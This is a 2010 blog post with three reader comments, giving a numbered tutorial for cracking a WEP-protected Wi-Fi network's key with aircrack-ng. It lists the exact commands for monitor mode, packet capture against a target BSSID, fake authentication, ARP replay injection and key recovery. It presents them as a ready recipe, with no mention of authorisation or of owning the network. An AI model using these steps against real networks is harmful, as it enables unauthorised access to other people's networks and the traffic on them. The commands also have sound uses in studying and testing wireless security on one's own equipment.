Sunday, May 30, 2010

Cracking wifi WEP key

 list of what you need :
1) A packet injection capable wireless adapter - check suported wireless adapter here
2) A linux distro - I use ubuntu as it is more user friendly. Backtrack is also recommended because the software that we will use are preinstalled
3) Aircrack software - how to get if? i'll show you in the tutorial later
                           
This tutorial only works on WEP networks. WPA tutorial will come later


lets begin

1) start ubuntu and open a terminal. type "sudo apt-get install aircrack-ng" (without the " ). This will install aircrack in your ubuntu

2) Type "sudo airmon-ng start wlan0" - this will activate monitor mode

3) Type "sudo airodump-ng mon0"

4) Open new terminal and type "sudo airodump-ng -c [channel] -w [filename] --bssid [bssid] mon0"
   -you can get the channel and bssid  from step 3, for file name, use anything that you like


5) Open new terminal and type "sudo aireplay-ng -1 0 -a [bssid] mon0"
     Wait until reply like this come out -
   Sending Authentication Request (Open System) [ACK]
   Authentication successful
   Sending Association Request [ACK]
   Association successful :-) (AID: 1)

6) Type "sudo aireplay-ng -3 -b [bssid] mon0

7) Finally "aircrack-ng -b [bssid] [filename]-01.cap" if cracking failed, wait few more minutes to collect more IV's

3 comments:

  1. this is cool yo.. But i use fedora, it's the same rite?

    ReplyDelete
  2. lol late reply, srry. and yeah its the same

    ReplyDelete
  3. i do that but nothing happen lol...

    ReplyDelete